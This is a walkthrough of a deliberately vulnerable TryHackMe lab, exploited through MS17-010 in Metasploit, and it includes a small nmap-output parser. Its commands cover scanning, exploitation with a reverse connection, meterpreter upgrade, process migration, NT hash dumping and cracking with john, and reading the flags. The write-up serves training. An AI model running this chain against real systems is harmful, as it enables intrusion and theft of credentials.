Room Link: https://tryhackme.com/room/blue
we don't know the IP of the target, so let's do a netdiscover scan to find it.
sudo netdiscover -i eth0 -r 10.0.2.0/24
now we know the IP of the target: 10.0.2.21
now let's first do an Nmap scan.
sudo nmap -sC -sV -A (the target's IP) -oN nmap.txt
first question: How many ports are open with a port number under 1000?
second question: What is this machine vulnerable to? (Answer in the form of:
ms??-???, ex: ms08-067)?
for this let's do a script scan.
sudo nmap -sC -A --script=vuln (IP address) -oN scriptscan.txt
note: this will take some time.
we have found that the machine is vulnerable to ms17-010.
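As an added example (not part of the original write-up), here is a small Python parser for the nmap -oN files the two scans above write: it counts the open ports under 1000 for the first question and pulls the MS bulletin id out of any NSE vuln script that reports VULNERABLE, ignoring "NOT VULNERABLE" lines. The nmap output inside it is a constructed sample, not the room's real result.

```python
import re

# Constructed sample of nmap "normal" (-oN) output, not the real room result: the port
# table is what the first scan writes, the script block is what --script=vuln adds.
SAMPLE_NMAP_TXT = """\
Nmap scan report for 10.0.2.21
PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds  Windows 7 Professional microsoft-ds
3389/tcp  open     ms-wbt-server
49154/tcp filtered unknown

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| smb-vuln-ms08-067:
|_  NOT VULNERABLE
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")  # 445/tcp open microsoft-ds
SCRIPT_RE = re.compile(r"^\|_?\s*([\w.-]+):\s*$")            # | smb-vuln-ms17-010:
VULN_RE = re.compile(r"^\|_?\s+VULNERABLE:\s*$")             # |   VULNERABLE:

def parse_ports(text):
    """Return (port, proto, state, service) tuples from the port table of -oN output."""
    return [(int(m.group(1)), m.group(2), m.group(3), m.group(4))
            for m in map(PORT_RE.match, text.splitlines()) if m]

def count_open_below(text, limit=1000):
    """Question 1: number of ports in state "open" with a port number under `limit`."""
    return sum(1 for port, _, state, _ in parse_ports(text) if state == "open" and port < limit)

def vulnerable_scripts(text):
    """NSE script ids that reported a VULNERABLE block, in the order seen."""
    found, current = [], None
    for line in text.splitlines():
        if VULN_RE.match(line):  # tested first: "|   VULNERABLE:" also looks like a script id line
            if current and current not in found:
                found.append(current)
        elif (m := SCRIPT_RE.match(line)):
            current = m.group(1)
    return found

def ms_bulletins(text):
    """Question 2: the MSyy-nnn bulletin id embedded in each vulnerable script name."""
    return [m.group(0) for m in (re.search(r"ms\d{2}-\d{3}", s) for s in vulnerable_scripts(text)) if m]
```

Point the functions at the contents of nmap.txt and scriptscan.txt respectively to get the two answers from your own scan.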
so let's search for the Metasploit module.
and now we find that the Metasploit module is exploit/windows/smb/
third question: Find the exploitation code we will run against the machine.
What is the full path of the code? (Ex: exploit/……..)
now let us start Metasploit with msfconsole,
now let us select the module by typing “use” followed by its full path
now let us look at the options we need to set.
4th question: Show options and set the one required value. What is
the name of this value? (All caps for submission)
now let's set RHOSTS, LHOST and LPORT (optional)
set RHOSTS (IP of the target)
set LHOST (IP of your machine)
now we are ready to run the exploit; type “run” to do it.
WOW, now we are in.
now let us background this and upgrade this shell to a meterpreter session for
more stability and more control (meterpreter runs in memory and offers many more post-exploitation commands).
to do it press ctrl+z
it is now done.
question 5: If you haven't already, background the previously
gained shell (CTRL + Z). Research online on how to convert a shell
to meterpreter shell in Metasploit. What is the name of the post
module we will use? (Exact path, similar to the exploit we
now to find this, search for shell_to_meterpreter in msfconsole
now let's use this post module
by typing “use post/multi/manage/shell_to_meterpreter”
now let us see what options we need to set by typing “options”
now we know that we need to set the SESSION option, because we already have
the session running in the background
question 6: Select this (use MODULE_PATH). Show options, what
option are we required to change? (All caps for answer)
now let us do this by listing the active sessions by typing “sessions”
now set the session by typing “set SESSION 1”
now type run to execute it
now we are good to go; again list the sessions and switch to the meterpreter
session by typing “sessions -i 2”
now we are in
now let us migrate to a process running as NT AUTHORITY\SYSTEM
to do this first list all the processes by typing “ps”
now let us migrate to 1828 by typing “migrate 1828”
now we dump the password hashes and get the hash of the user named Jon.
now let us crack the hash using john the ripper
to do that make a txt file and paste the hash you got into it
now use the command
“john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT”
and then to show the password type “john hash.txt --show --format=NT”
question 7: Copy this password hash to a file and research how to
crack it. What is the cracked password?
now let us find the flags
the first flag is found in C:\
to get it first go to the shell by typing “shell”
now list the files by typing “dir”
you can see flag1.txt; to read the flag use the command “type flag1.txt”
now let us find the second flag
the second flag's location is
the third flag is located in